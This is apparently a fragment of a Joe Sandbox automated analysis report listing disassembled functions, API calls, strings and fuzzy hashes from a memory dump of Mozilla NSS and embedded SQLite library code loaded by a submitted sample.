strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7F7372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C930148,,defaultModDB,internalKeySlot), ref: 6C7F74CC
free.MOZGLUE(00000000), ref: 6C7F7513
free.MOZGLUE(00000000), ref: 6C7F751B
free.MOZGLUE(00000000), ref: 6C7F7528
free.MOZGLUE(00000000), ref: 6C7F753C
free.MOZGLUE(00000000), ref: 6C7F7550
free.MOZGLUE(00000000), ref: 6C7F7561
free.MOZGLUE(00000000), ref: 6C7F7572
free.MOZGLUE(00000000), ref: 6C7F7583
free.MOZGLUE(00000000), ref: 6C7F7594
free.MOZGLUE(00000000), ref: 6C7F75A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C7F75BD
free.MOZGLUE(00000000), ref: 6C7F75C8
free.MOZGLUE(00000000), ref: 6C7F75F1
PR_NewLock.NSS3 ref: 6C7F7636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C7F7686
PR_NewLock.NSS3 ref: 6C7F76A2

Part of subcall function 6C8A98D0: calloc.MOZGLUE(00000001,00000084,6C7D0936,00000001,?,6C7D102C), ref: 6C8A98E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C7F76B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C7F7707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C7F771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C7F7731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C7F774A
DeleteCriticalSection.KERNEL32(?), ref: 6C7F7770
free.MOZGLUE(?), ref: 6C7F7779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7F779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7F77AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C7F77C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C7F77DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C7F7821
PORT_Alloc_Util.NSS3(?), ref: 6C7F7837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C7F785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C7F786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C7F78AC
free.MOZGLUE(00000000), ref: 6C7F78BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C7F78F3
free.MOZGLUE(00000000), ref: 6C7F78FC
free.MOZGLUE(00000000), ref: 6C7F791C

Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07AD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07CD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07D6
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C76204A), ref: 6C7D07E4
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,6C76204A), ref: 6C7D0864
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7D0880
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C76204A), ref: 6C7D08CB
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08D7
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08FB

Strings

extern:, xrefs: 6C7F772B
kbi., xrefs: 6C7F7886
rdb:, xrefs: 6C7F7744
dll, xrefs: 6C7F788E
Spac, xrefs: 6C7F7389
sql:, xrefs: 6C7F76FE
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C7F74C7
,defaultModDB,internalKeySlot, xrefs: 6C7F748D, 6C7F74AA
NSS Internal Module, xrefs: 6C7F74A2, 6C7F74C6
dbm:, xrefs: 6C7F7716

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 9a6058901ba019d7c73bb57098469dc81528f3ead27084ff2f11de8082a27885
Instruction ID: 6b6f9b4d2eac0ef90ce730634b7faa610bd6ebfe033d01b2a58578061ee678c1
Opcode Fuzzy Hash: 9a6058901ba019d7c73bb57098469dc81528f3ead27084ff2f11de8082a27885
Instruction Fuzzy Hash: 375214B1E046059BEF219F68CE857AA7BB4BF0930CF248534EC29A7B41E730D955CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C806D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C90A8EC,0000006C), ref: 6C806DC6
memcpy.VCRUNTIME140(?,6C90A958,0000006C), ref: 6C806DDB
memcpy.VCRUNTIME140(?,6C90A9C4,00000078), ref: 6C806DF1
memcpy.VCRUNTIME140(?,6C90AA3C,0000006C), ref: 6C806E06
memcpy.VCRUNTIME140(?,6C90AAA8,00000060), ref: 6C806E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C806E38

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C806E76
TlsGetValue.KERNEL32 ref: 6C80726F
EnterCriticalSection.KERNEL32(?), ref: 6C807283

Strings

!, xrefs: 6C807123

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 177b3b1edf18c00e3e30056c1c60e6237edfac45833c9742169b3a7d68dfdafd
Instruction ID: 3592328b9975404271fb6f8aba4c15d66742ebae4f6d46892d0e0cea10ee27d3
Opcode Fuzzy Hash: 177b3b1edf18c00e3e30056c1c60e6237edfac45833c9742169b3a7d68dfdafd
Instruction Fuzzy Hash: 7B728F75E052199FDF60DF28CD8879ABBB5BF49308F1045A9D80DA7741EB31AA84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C7CE6E0 Relevance: 44.2, APIs: 17, Strings: 8, Instructions: 452stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,6C7CDA6A,?,00000000,?,?), ref: 6C7CE6FF
sqlite3_initialize.NSS3(?,?,00000000,?,6C7CDA6A,?,00000000,?,?), ref: 6C7CE76B
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7CDA6F,///,00000003,?,?,00000000), ref: 6C7CE7AC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7CDA71,///,00000003), ref: 6C7CE7C8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7CE8E8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7CE908
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C7CE921
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7CE978
memcmp.VCRUNTIME140(?,?,6C7CDA6A), ref: 6C7CE991
sqlite3_initialize.NSS3(?,?,00000000,?,6C7CDA6A,?,00000000,?,?), ref: 6C7CE9FA
memcpy.VCRUNTIME140(?,6C7CDA6A,00000000,?,?,00000000), ref: 6C7CEA3A
sqlite3_initialize.NSS3(?,?,00000000), ref: 6C7CEA55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C7CEABA
sqlite3_mprintf.NSS3(no such %s mode: %s,6C91E039,?), ref: 6C7CEB9F
sqlite3_free.NSS3(000000FC,?,?,?,?,00000000), ref: 6C7CEBDB
sqlite3_mprintf.NSS3(no such vfs: %s,?,?,?,00000000), ref: 6C7CEC1A
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,//localhost/,0000000C), ref: 6C7CEC2E

Strings

mode, xrefs: 6C7CEC58
cach, xrefs: 6C7CE93A
//localhost/, xrefs: 6C7CEC26
///, xrefs: 6C7CE7A3, 6C7CE7C2
no such %s mode: %s, xrefs: 6C7CEB9A
no such vfs: %s, xrefs: 6C7CEC15
file, xrefs: 6C7CE738
%s mode not allowed: %s, xrefs: 6C7CECB7

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: strlen$sqlite3_initializestrncmp$sqlite3_mprintf$memcmpmemcpysqlite3_freestrcmp
String ID: %s mode not allowed: %s$///$//localhost/$cach$file$mode$no such %s mode: %s$no such vfs: %s
API String ID: 3798319595-1352301890
Opcode ID: 4f82bdbb12a3e02d4518944c2bac135ace404fe2a343094ed0f66ec237fe6662
Instruction ID: 05d6f68e1b6c333cd813bb4a5e3fb944fd0fd759fc29fe5bcc26f7e3ff4ca539
Opcode Fuzzy Hash: 4f82bdbb12a3e02d4518944c2bac135ace404fe2a343094ed0f66ec237fe6662
Instruction Fuzzy Hash: 89F10271F0525F8FEB108F65CA827BEBBB1AB05308F184539D86667A80D7359901CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C788460 Relevance: 43.1, APIs: 23, Strings: 1, Instructions: 1095COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,00000030), ref: 6C7884FF
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(377F0682), ref: 6C7888BB
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002DE218), ref: 6C7888CE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7888E2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFFFF), ref: 6C7888F6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C78894F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C78895F
sqlite3_randomness.NSS3(00000008,?), ref: 6C788914

Part of subcall function 6C7731C0: sqlite3_initialize.NSS3 ref: 6C7731D6

sqlite3_randomness.NSS3(00000004,?), ref: 6C788A13
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C788A65
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C788A6F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C788B87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C788B94
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002E5B33), ref: 6C788BAD

Strings

cannot limit WAL size: %s, xrefs: 6C789188

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_randomness$memcmpsqlite3_initialize
String ID: cannot limit WAL size: %s
API String ID: 2554290823-3503406041
Opcode ID: 32252e2a2068572781ac3e35aa687eddada61670b2162a34a70a23eb38ddb675
Instruction ID: c2765d6c2750b1a5e7ed93da127a7907084d5605f95ef9086777c7f4c6fc88ba
Opcode Fuzzy Hash: 32252e2a2068572781ac3e35aa687eddada61670b2162a34a70a23eb38ddb675
Instruction Fuzzy Hash: 20928E71A093019FD704CF29D984A5AB7F1FF88318F188A3DEA9987751E731E855CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6C84AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C84ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C84ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C84ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C84AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C84ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C84ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C84ADF0

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C84B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C84B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C84B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C84B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C84B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C84B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C84B40C

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 3cb5f34703f697aec3b7df5db8acc8b0c9368fc611a21f16bbb511324172a6f9
Instruction ID: 83f893788b00585dbdf5086dc3e308cbb4a22b422d20c05467317a5757a4a93b
Opcode Fuzzy Hash: 3cb5f34703f697aec3b7df5db8acc8b0c9368fc611a21f16bbb511324172a6f9
Instruction Fuzzy Hash: 8222A071904305ABE720CF18CE44BAA77E1AF8430CF14897CE9585B792E772E859CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6C7D4420 Relevance: 37.9, APIs: 10, Strings: 11, Instructions: 1186stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7D4EE3

Strings

second, xrefs: 6C7D4BCA
a generated column, xrefs: 6C7D4D58, 6C7D4E8B
non-deterministic use of %s() in %s, xrefs: 6C7D4D71, 6C7D4EA4
-, xrefs: 6C7D4FBA
40f-21a-21d, xrefs: 6C7D44D0
a CHECK constraint, xrefs: 6C7D4D62, 6C7D4D6D, 6C7D4E95, 6C7D4EA0
an index, xrefs: 6C7D4D53, 6C7D4E86
weekday , xrefs: 6C7D54AB
start of , xrefs: 6C7D517A
w=}l, xrefs: 6C7D4431, 6C7D4E25, 6C7D533D, 6C7D5536, 6C7D55A0, 6C7D4A83, 6C7D4A99, 6C7D5313, 6C7D5325, 6C7D4CFC, 6C7D4A8C, 6C7D51AC, 6C7D48B9, 6C7D46CD, 6C7D4786, 6C7D48D5, 6C7D490D, 6C7D5404, 6C7D5411, 6C7D541E, 6C7D5365, 6C7D537B, 6C7D536E, 6C7D542A, 6C7D5466, 6C7D53C9, 6C7D5211, 6C7D4BA1, 6C7D5013, 6C7D521D, 6C7D4C69, 6C7D528B, 6C7D4691, 6C7D5058, 6C7D4E5E, 6C7D4FA4, 6C7D4FEB, 6C7D4FDF, 6C7D4F9D, 6C7D4E77, 6C7D4EDF, 6C7D4576, 6C7D4F90
w=}l, xrefs: 6C7D47FB

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: strlen
String ID: -$40f-21a-21d$a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$second$start of $w=}l$w=}l$weekday
API String ID: 39653677-55179180
Opcode ID: 4a922f1255baa1436b092d4f5f20323c02ec4df49a721c3f4d9edaead6d7047a
Instruction ID: 5d29558e21c88ae1b4307b7a31373f5d42da3b69f49255573d08521b04c9a8b2
Opcode Fuzzy Hash: 4a922f1255baa1436b092d4f5f20323c02ec4df49a721c3f4d9edaead6d7047a
Instruction Fuzzy Hash: 64A263716087808FC711CF34C251366BBE2EF96358F16866DE8EA5BB42E735E886C741

Uniqueness

Uniqueness Score: -1.00%

Function 6C7CECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C7CED38

Part of subcall function 6C764F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C764FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C7CEF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C7CEFE4

Part of subcall function 6C88DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C765001,?,00000003,00000000), ref: 6C88DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C7CF087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C7CF129
sqlite3_mprintf.NSS3(optimize), ref: 6C7CF1D1
sqlite3_free.NSS3(?), ref: 6C7CF368

Strings

fts3_tokenizer, xrefs: 6C7CEE1A, 6C7CEEA8
snippet, xrefs: 6C7CEF05, 6C7CEF37, 6C7CEF7C
fts3tokenize, xrefs: 6C7CF30F
optimize, xrefs: 6C7CF199, 6C7CF1CC, 6C7CF211
simple, xrefs: 6C7CED79
offsets, xrefs: 6C7CEFAF, 6C7CEFDF, 6C7CF01F
fts4, xrefs: 6C7CF2AD
fts3, xrefs: 6C7CF247
unicode61, xrefs: 6C7CEDB5
fts4aux, xrefs: 6C7CECF9
matchinfo, xrefs: 6C7CF04F, 6C7CF082, 6C7CF0C2, 6C7CF0F2, 6C7CF124, 6C7CF169
porter, xrefs: 6C7CED97

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 7a3bebb1b4b95d9283ad56e16dd17d761051ca249562b6b88bd6fb30c03ec1d7
Instruction ID: 012329ec4892c5da155c27995fc1ff04a4cdc5194c0252d0a5205599b5cd497f
Opcode Fuzzy Hash: 7a3bebb1b4b95d9283ad56e16dd17d761051ca249562b6b88bd6fb30c03ec1d7
Instruction Fuzzy Hash: 4802D5B1B083029FE704AF31AA8676B37B56BC570CF24853DD85957B40EB74E8458793

Uniqueness

Uniqueness Score: -1.00%

Function 6C80A4D0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 501stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(6C7E28AD,pkcs11:,00000007), ref: 6C80A501
PORT_Strdup_Util.NSS3(6C7E28AD), ref: 6C80A514

Part of subcall function 6C840F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C7E2AF5,?,?,?,?,?,6C7E0A1B,00000000), ref: 6C840F1A
Part of subcall function 6C840F10: malloc.MOZGLUE(00000001), ref: 6C840F30
Part of subcall function 6C840F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C840F42

strchr.VCRUNTIME140(00000000,0000003A), ref: 6C80A529
PK11_GetInternalKeySlot.NSS3 ref: 6C80A60D
PR_SetError.NSS3(FFFFE041,00000000), ref: 6C80A74B
PR_SetError.NSS3(FFFFE041,00000000), ref: 6C80A777
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C80A80C
memcmp.VCRUNTIME140(?,00000001,00000000), ref: 6C80A82B
CERT_DestroyCertificate.NSS3(00000000), ref: 6C80A952
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C80A9C3

Part of subcall function 6C830960: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,6C80A8F5,00000000,?,00000010), ref: 6C83097E
Part of subcall function 6C830960: memcmp.VCRUNTIME140(?,00000000,6C80A8F5,00000010), ref: 6C83098D

free.MOZGLUE(00000000), ref: 6C80AB18
strchr.VCRUNTIME140(?,00000040), ref: 6C80AB40
free.MOZGLUE(?), ref: 6C80ABE1

Part of subcall function 6C804170: TlsGetValue.KERNEL32(?,6C7E28AD,00000000,?,6C80A793,?,00000000), ref: 6C80419F
Part of subcall function 6C804170: EnterCriticalSection.KERNEL32(0000001C), ref: 6C8041AF
Part of subcall function 6C804170: PR_Unlock.NSS3(?), ref: 6C8041D4

Strings

object, xrefs: 6C80A5CF
manufacturer, xrefs: 6C80A8A2
model, xrefs: 6C80A8CF
token, xrefs: 6C80A875
pkcs11:, xrefs: 6C80A4FB

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: strlen$Errorfreememcmpstrchr$CertificateCriticalDestroyEnterInternalK11_L_strncasecmpSectionSlotStrdup_UnlockUtilValuemallocmemcpy
String ID: manufacturer$model$object$pkcs11:$token
API String ID: 916065474-709816111
Opcode ID: 0ee17e9ad04aa3c18053b0640bfa05387b0197958500135a4228b2f2ef75f3bf
Instruction ID: 599a7009c1ffeb781e81cb27a5f9557cd04cadb00848a5de160122397e19aa10
Opcode Fuzzy Hash: 0ee17e9ad04aa3c18053b0640bfa05387b0197958500135a4228b2f2ef75f3bf
Instruction Fuzzy Hash: AD02B6B5E002289FEF319B249E45BDA7675AF0121CF1404B4E80CA6752FB319E59CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C80E6E0 Relevance: 30.6, APIs: 20, Instructions: 581memorythreadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C80E8AB
EnterCriticalSection.KERNEL32(?), ref: 6C80E8BF
PORT_Alloc_Util.NSS3(0000000C), ref: 6C80EA30
PK11_Encrypt.NSS3(?,?,?,?,?,?,00000000,?), ref: 6C80EA6A
PORT_Alloc_Util.NSS3(?), ref: 6C80EB0D
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C80EB23
memcpy.VCRUNTIME140(?,?), ref: 6C80EB38
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C80EB50
PR_SetError.NSS3(00000000,00000000), ref: 6C80EC0F
PR_Unlock.NSS3(?), ref: 6C80EC68
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C80EC7D
PR_Unlock.NSS3(?), ref: 6C80EC9C
PK11_Decrypt.NSS3(?,?,?,?,?,?,00000000,?), ref: 6C80ECCF
PR_GetCurrentThread.NSS3 ref: 6C80ED02
PK11_Decrypt.NSS3(?,00001087,?,?,?,?,?,?), ref: 6C80ED6F
PK11_Encrypt.NSS3(?,00001087,?,?,?,?,?,?), ref: 6C80EDB7
memcpy.VCRUNTIME140(?,?,?), ref: 6C80EDF6
memcpy.VCRUNTIME140(?,?), ref: 6C80EE12
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C80EE2B

